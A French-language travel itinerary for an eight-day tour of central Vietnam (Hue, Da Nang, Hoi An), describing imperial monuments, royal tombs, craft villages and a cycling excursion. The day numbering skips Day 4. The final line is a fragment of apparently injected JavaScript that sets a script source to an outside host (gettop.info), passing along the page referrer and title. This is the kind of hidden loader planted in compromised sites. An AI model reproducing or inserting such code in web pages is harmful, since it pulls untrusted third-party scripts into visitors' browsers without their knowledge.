Merveilles patrimoines mondiaux au Centre

Jour 1: HA NOI – HUE[B]

A votre arrivée à l’aéroport, accueil et transfert au centre ville de Hue, ancienne capitale de l’empire féodal des Nguyen au XIXe siècle. Située aux bords de la Rivière des Parfums, cette ville attache les touristes par son âme poétique, le charme vétuste de ses maisons jardins ravissantes et  la fraîcheur des tuniques blanches portées par les jeunes filles. Hue est constituée de palais et de tombeaux royaux les plus luxueux d’Asie du Sud- Est.

L’après –midi, visite du marché local de Dong Ba.

Diner libre.

Nuit à l’hôtel.

Jour 2: Visite de HUE [B]

Petit-déjeuner, Croisière reposante en bateau sur la rivière des parfums, un arrêt à la pagode de la Dame Céleste avec sa célèbre tour octogonale surplombant la rivière.

Déjeuner libre

Ensuite, visite du tombeau de Tu Duc, situé à 7 km au sud de Hué, c’est sans doute le plus romantique et le plus séduisant. En fait, à Khiem Long, son autre nom, on a davantage l’impression de visiter une résidence de plaisir qu’un tombeau. C’est un peu normal puisque construit du vivant du roi qui l’appelait son Eternité, il lui servait de retraite régulière pour venir composer quelques poèmes dont il était friand, ou pour tout simplement pêcher. Ce parc abrite non seulement tous les éléments d’un tombeau royal, mais encore tous les bâtiments d’une résidence royale: Palais de séjour du roi, palais des femmes du harem, pavillon pour la lecture, kiosque pour la pêche et les jeux d’échecs, et même  une scène pour des représentations théâtrales de la troupe  royale composée seulement d’actrices…Le tout en harmonie avec un système de jardins fleuris où poussent des essences rares et précieuses, de lacs, d’étangs, d’îlots avec passerelles et ponts, de bois couverts de toiture, de montagnes en miniature et d’allées bordées de pins…

Au retour à Hue, arrêt au village spécialisé dans la fabrication de bâtonnets d’encens

Retour à l’hôtel.

Diner libre

Nuitée à Hue

Jour 3: Visite de HUE [B]

Petit-déjeuner,  Visite de la Cité impériale: 9 génies Canons, la Porte du Midi surmontée du Belvédère des Cinq Phénix; Le Palais de l’Harmonie Suprême; les pavillons de l’Est et de l’Ouest; le Pavillon de Lecture; le Théâtre Royal; les palais privés de la Reine Mère: le Palais de la Longévité, les pavillons du Thé et du Bateau, la Pagode Privée; le Temple de la Résurrection, le Temple du Culte des empereurs Nguyen, 9 Urnes dynastiques; le Pavillon de Bienveillance; la Porte de la Vertu.

Déjeuner libre

L’après midi, visite du village de fabrication des fleurs en papier Thanh Tien et le village Sinh qui fait référence aux peintré et artistes vietnamiens traditionnels.

Retour à l’hôtel.

Diner libre

Nuitée à Hue

Jour 5: HUE – DA NANG – HOI AN[B]

Petit-déjeuner, Route pour Danang. L’attraction principale est la route serpentant des cols dont le plus grand est le Col des Nuages. Ce nom est tiré de certaines circonstances où les nuages planent autour de vous. Cette traversée offre une vision panoramique d’un village de pêcheurs sur une vaste dune de sable, de somptueux paysages avec des vues sur de ravissantes baies et lagunes aux eaux d’un vert émeraude limpide.

A Danang (Ex-Tourane), visite du musée Cham qui renferme la plus importantecollection de sculptures chams au monde. Puis un petit arrêt dans un village de sculpture de marbre.

Déjeuner libre

Ensuite, route pour Hoi An a conservé cette atmosphère du passé qui vous envahit au fur et à mesure de votre séjour. Nombre d’anciens bâtiments présentent des particularités architecturales que l’on voit rarement aujourd’hui.

L’architecture des temples chinois, des pagodes et des demeures de riches marchands est remarquable. Visite de la ville: le pont japonais, la maison Tan Ky, le temple Phuc Kien, quelques boutiques ateliers: la soie, la sculpture…; et promenade le long de la rivière jusqu’au marché central.

Nuit à l’hôtel.

Jour 6 : Visite de HOI AN  [B, L]

 Petit-déjeuner, balade en vélo aux alentours de Hoi An en direction du villages de pêcheurs entouré par la forêt de cocotiers, les canaux, les maisons couvertes en feuille de cocotier d’eau.

Sur le chemin à travers le village, plusieurs arrêts interessants sont prévus: le marché local typique, les rizières.

Arrivée au village, les pêcheurs vous amèneront à la découverte de leurs techniques de la pêche traditionnelle et leurs forêts cocotiers par une croisière en “Thung chai“- Bateau panier.

Balade en suite en vélo jusqu’au village de maraicher Tra Que – Plus de 200 propriétaires et 500 cultuvateurs vivent sur place et cultivent 20 types de légumes et d’herbes.

Puis, balade dans ce village, òu vous contacterez avec les habitants locaux qui traillent aux jardins.

Retour et préparation du déjeuner ensemble avec sa famille comme les crêpes croustillantes, Nem de Hoi An,….

Après le dejeuner, une détente avec massage des pieds aux herbes médicinales, une pratique thé rapeutique traditionelle.

Retour en ville et temps libre

Diner libre

Nuit à l’hôtel.

Jour 7 : HOI AN – libre [B] (sans guide ni voiture)

 Une journée libre pour vous reposer sur une des meilleures destinations en Asie. Repas libres

Nuit à l’hôtel.

Jour 8: Hoi An – Hue – Ha Noi (sans guide)

 Temps libre, retour à Hue, transfert à l’aéroport pour le vol vers Hanoi

Bon voyage et af bientot avec Viet Voyage!

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; } else {